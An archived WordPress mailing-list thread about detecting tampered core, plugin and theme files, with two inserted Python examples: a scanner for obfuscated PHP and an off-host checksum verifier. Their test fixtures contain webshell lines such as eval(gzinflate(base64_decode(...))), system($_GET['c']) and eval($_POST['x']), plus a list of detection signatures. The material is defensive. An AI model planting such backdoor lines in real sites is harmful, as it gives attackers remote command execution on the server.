Discussion:
A tool to check whether the core files were tampered?
Davit Barbakadze
2013-11-15 12:36:26 UTC
Hi. Do you guys have a tool to check whether the core files were
tampered with? Like a plugin that you install on the WordPress site and it
checks all the core files, plugins and themes (taking into account the
versions) and outputs in a user-friendly way in the backend?

That might be something of immense help to an average dev.

I've found this one: http://wordpress.org/plugins/hashchecker/, but it
seems to be checking only WordPress files. I imagine something doing
similar to plugins and themes. Also this one seems to be abandoned for
a couple of years already.

Davit Barbakadze
Simon Weil
2013-11-15 12:41:09 UTC
Try Wordfence, it's good for core and plugins:
http://wordpress.org/plugins/wordfence/
_______________________________________________
wp-hackers mailing list
http://lists.automattic.com/mailman/listinfo/wp-hackers
Stephen Harris
2013-11-15 12:42:36 UTC
I use "WordPress File Monitor Plus" (
http://wordpress.org/plugins/wordpress-file-monitor-plus/). This
provides a list of changed files (and optionally gives you email
alerts), and it looks in the plug-in/theme directories too.

But it does a slightly different job than hashchecker - that is, it
detects changes in the local files rather than comparing local files to
the released ones. So perhaps it isn't quite what you're after.

Stephen Harris
Davit Barbakadze
2013-11-15 13:50:41 UTC
Wordfence seems to be a perfect solution for the task and a useful
plugin in general.

Thanks guys and Simon in particular :)
Davit Barbakadze
Simon Weil
2013-11-15 13:54:37 UTC
Glad to have helped :)
By the way, I use it together with "Better Wordpress Security", which among
many other features also sends me an email for every file change. Security-wise
it is very useful.
David Anderson
2013-11-15 16:42:33 UTC
Hi,

Since I sell a solution in this area, I'm biased...

... but, as a long-time security pro, I'd say that a plugin which offers
to check that your website hasn't been tampered with fails at the
conceptual level. Useless. It's only good as long as you're sure that
the plugin itself is intact. Altering the plugin is trivially easy (e.g.
1 line to short-circuit the tamper check, and 'return true;'). It's like
asking your young son "you would tell me if you were lying, wouldn't
you?". "Yeah dad, sure". "Thanks - I was almost worried for a moment there."

Why would someone who tampers with your website *not* tamper with the
security check? Basically, you're relying on the hacker being
incompetent. Wordfence (for example) has had over 1 million downloads.
How incompetent would someone trying to break into WordPress sites have
to be not to have "short-circuit Wordfence's tamper checks" in his toolkit?

Unless you're happy assuming that hackers will continue ignoring
WordFence (etc.) so that their hacks can get cleaned up quicker, then
the only way to verify your files is off-site, i.e. externally. Anything
(not just a plugin) that you run within the same web-space could itself
be tampered with. A service which has pristine versions of your plugins,
and can compare them in a 'clean room' with what's installed. <Advert>I
do this with my own tool (from the command line: "wordshell all
--everything --checkmodifications"). It avoids this issue because it
does not run any code on the webserver for that operation</Advert>. I'm
sure there must be other functional solutions as well.

Best wishes,
David
--
WordShell - WordPress fast from the CLI - www.wordshell.net
J.D. Grimes
2013-11-15 17:07:27 UTC
Agreed that its usefulness in that regard is limited. But it is more useful in this case, when checking if a site has been previously tampered with before the plugin was installed.
Mika A Epstein
2013-11-15 18:10:49 UTC
Given the nature of most 'tampering' is to add in obfuscated code, I
just search for that. Or if I even remotely suspect it, delete core and
plugins, reinstall. It's not like it hurts my data.

It'd be nice if someone made a wp-cli-esque sort of scanner for this,
though, since in theory if that was baked in, they couldn't mess with
the scanner unless they had access to edit wp-cli (i.e. SU or root)
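The "search for obfuscated code" approach from the post above, written out as a small off-host scanner. This is an added example, not code from the thread or from any plugin named in it. The signature list and weights are my own illustrative choices (legitimate code does call base64_decode and friends, so the result is a ranked list to review, not a verdict), and the three PHP files it scans are constructed here to show one clean file, one eval(gzinflate(base64_decode(...))) chain and one uploaded "image" that is really a shell.

```python
import os
import re
import tempfile

# Heuristic signatures for obfuscated PHP payloads. Each pattern carries a
# weight; a file's score is the sum of the weights of the patterns it matches.
# Illustrative list chosen for this example, not an authoritative one.
SIGNATURES = [
    (re.compile(r"\beval\s*\(", re.I), 3, "eval()"),
    (re.compile(r"\bbase64_decode\s*\(", re.I), 2, "base64_decode()"),
    (re.compile(r"\b(gzinflate|gzuncompress|str_rot13)\s*\(", re.I), 2, "decompression/rot13"),
    (re.compile(r"\b(assert|create_function)\s*\(", re.I), 2, "assert()/create_function()"),
    (re.compile(r"preg_replace\s*\(\s*['\"][^'\"]*/[a-z]*e[a-z]*['\"]", re.I), 3, "preg_replace /e"),
    (re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b"), 1, "superglobal access"),
    (re.compile(r"(\\x[0-9a-f]{2}){8,}", re.I), 2, "long hex-escaped string"),
    (re.compile(r"(chr\s*\(\s*\d+\s*\)\s*\.\s*){4,}", re.I), 2, "chr() concatenation"),
]
LONG_LINE = 1000   # minified legitimate code exists, so this only adds weight
THRESHOLD = 4      # report files scoring at least this much


def score_source(src):
    """Return (score, reasons) for one PHP source string."""
    score, reasons = 0, []
    for pattern, weight, label in SIGNATURES:
        hits = len(pattern.findall(src))
        if hits:
            score += weight * min(hits, 3)   # cap so one construct cannot dominate
            reasons.append(f"{label} x{hits}")
    if any(len(line) > LONG_LINE for line in src.splitlines()):
        score += 1
        reasons.append(f"line longer than {LONG_LINE} chars")
    # eval() wrapped directly around a decoder is the classic injected chain.
    if re.search(r"eval\s*\(\s*(gzinflate|gzuncompress|str_rot13|base64_decode)\s*\(", src, re.I):
        score += 5
        reasons.append("eval() wrapped around a decoder")
    return score, reasons


def scan_tree(root, threshold=THRESHOLD):
    """Score every PHP file under root; return {relative_path: (score, reasons)} for hits."""
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith((".php", ".phtml", ".inc")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                score, reasons = score_source(fh.read())
            if score >= threshold:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = (score, reasons)
    return findings


# Constructed sample tree: one clean plugin file and two injected files.
SAMPLES = {
    "wp-content/plugins/hello/hello.php":
        "<?php\nfunction hello_dolly() { echo esc_html('Hello, Dolly'); }\n"
        "add_action('admin_notices', 'hello_dolly');\n",
    "wp-content/themes/twentythirteen/footer.php":
        "<?php wp_footer(); ?>\n"
        "<?php eval(gzinflate(base64_decode('S0lLTUxqVkrUUEpLTkwFAA=='))); ?>\n",
    "wp-content/uploads/2013/11/img.php":
        "<?php $k = $_POST['c']; @assert($k); "
        "$x = \"\\x63\\x68\\x6d\\x6f\\x64\\x20\\x37\\x37\\x37\";\n",
}


def build_sample_tree():
    """Write the constructed samples into a temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="wp-scan-")
    for rel, body in SAMPLES.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, (score, reasons) in sorted(scan_tree(build_sample_tree()).items()):
        print(f"{score:3d}  {rel}: {', '.join(reasons)}")
```

Run it against a copy of the site pulled to your own machine (rsync or SFTP), not from inside the web root; a scanner that executes on the compromised host is subject to the same short-circuiting objection raised earlier in the thread. The hello.php sample scores zero, the footer scores 12 because of the eval/decoder chain, and the uploaded img.php scores 5 from assert(), the superglobal and the hex-escaped string.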
Roger Chen
2013-11-16 04:22:17 UTC
If you're concerned that your core files are corrupted or have been
tampered with, you can always just do a find . -type f | xargs md5sum and
compare (diff) it to a fresh copy from wordpress.org. On the other hand,
the only parts of your installation that should differ from a clean install
are your wp-config and wp-content. You should be able to replace all of the
core files without an issue.

Roger
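David's "clean room" argument and Roger's find | md5sum | diff recipe describe the same check: hash a copy of the install off-host and compare it with what wordpress.org shipped. The script below is an added example, not the thread's code or any plugin's, and it runs nowhere on the webserver. The manifest is constructed here; its shape ({"relative/path": md5hex}) follows the checksums map the wordpress.org core checksums API returns, which is an assumption about that API's output rather than a live fetch. It reports three things a plain diff of two listings easily blurs: core files that changed, core files that vanished, and files that core never shipped (the usual webshell drop), while skipping wp-config.php and wp-content/, which Roger rightly notes are expected to differ.

```python
import hashlib
import os
import tempfile

# Paths that legitimately differ from a clean install and are therefore not
# reported as "unexpected". Everything else under the web root should be in the
# manifest.
SITE_SPECIFIC_DIRS = ("wp-content/",)
SITE_SPECIFIC_FILES = {"wp-config.php", ".htaccess"}


def file_digest(path, algo="md5"):
    """Hash a file in chunks; md5 is the default because that is what the upstream manifest carries."""
    h = hashlib.new(algo)
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_tree(site_root, manifest, algo="md5"):
    """Compare a local copy of a WordPress install against a pristine manifest.

    manifest: {"relative/path": "hexdigest"}. Returns sorted lists of
    modified, missing and unexpected files relative to site_root.
    """
    modified, missing = [], []
    for rel, expected in manifest.items():
        path = os.path.join(site_root, *rel.split("/"))
        if not os.path.isfile(path):
            missing.append(rel)
        elif file_digest(path, algo) != expected.lower():
            modified.append(rel)

    unexpected = []
    for dirpath, _, filenames in os.walk(site_root):
        for name in filenames:
            rel = os.path.relpath(os.path.join(dirpath, name), site_root).replace(os.sep, "/")
            if rel in manifest or rel in SITE_SPECIFIC_FILES or rel.startswith(SITE_SPECIFIC_DIRS):
                continue
            unexpected.append(rel)   # core never shipped this file
    return {"modified": sorted(modified), "missing": sorted(missing), "unexpected": sorted(unexpected)}


# Constructed stand-in for a pristine release; file contents are invented for the example.
PRISTINE = {
    "index.php": "<?php\ndefine('WP_USE_THEMES', true);\nrequire __DIR__ . '/wp-blog-header.php';\n",
    "wp-includes/version.php": "<?php\n$wp_version = '3.7.1';\n",
    "wp-includes/functions.php": "<?php\nfunction wp_nonce_tick() { return 1; }\n",
    "wp-admin/index.php": "<?php\nrequire_once dirname(__FILE__) . '/admin.php';\n",
}


def build_manifest(files, algo="md5"):
    """Derive the {path: digest} manifest from the pristine contents."""
    return {rel: hashlib.new(algo, body.encode("utf-8")).hexdigest() for rel, body in files.items()}


def build_sample_site():
    """Write a tampered copy of PRISTINE to a temp dir: one core file backdoored, one
    removed, one dropped-in shell, plus the site-specific files a real install has."""
    root = tempfile.mkdtemp(prefix="wp-verify-")
    site = dict(PRISTINE)
    site["wp-includes/functions.php"] += "if (isset($_GET['c'])) { system($_GET['c']); }\n"
    del site["wp-admin/index.php"]
    site["wp-includes/class-wp-cache.php"] = "<?php eval($_POST['x']);\n"
    site["wp-config.php"] = "<?php define('DB_NAME', 'wp');\n"
    site["wp-content/plugins/hello/hello.php"] = "<?php\n"
    for rel, body in site.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8", newline="") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    report = verify_tree(build_sample_site(), build_manifest(PRISTINE))
    for kind, paths in report.items():
        for rel in paths:
            print(f"{kind:10s} {rel}")
```

In real use the site copy is pulled to the operator's machine and the manifest is fetched from wordpress.org for the exact version and locale installed; the comparison then happens on a host the attacker does not control, which is the whole point of David's objection to in-site checkers. Plugins and themes need their own manifests (or a pristine download of each version unpacked and hashed the same way), since the core manifest only covers what is in the release archive.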
Gabriel Acosta
2013-11-16 20:29:39 UTC
Just make a git repository on your installation, then you run git status and
can see any changed files.